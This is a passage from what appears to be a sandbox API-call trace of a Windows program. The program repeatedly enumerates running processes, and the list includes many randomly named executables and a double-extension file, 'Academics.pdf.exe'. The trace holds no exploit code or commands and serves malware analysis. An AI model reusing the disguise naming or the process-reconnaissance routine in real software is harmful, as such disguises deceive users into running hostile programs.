cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.694] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0315.695] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.696] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0315.696] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0315.697] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0315.698] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0315.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0315.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0315.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0315.701] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0315.702] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0315.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0315.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0315.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0315.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0315.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0315.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0315.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0315.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0315.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0315.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0315.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0315.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0315.715] CloseHandle (hObject=0x294) returned 1 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0315.716] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0315.716] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0315.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.718] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.719] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0315.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0315.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0315.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0315.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0315.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0315.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0315.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0315.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0315.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0315.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0315.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0315.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0315.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0315.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0315.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0315.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0315.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0315.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0315.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0315.753] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.754] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0315.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0315.756] CloseHandle (hObject=0x294) returned 1 [0315.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0315.757] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: 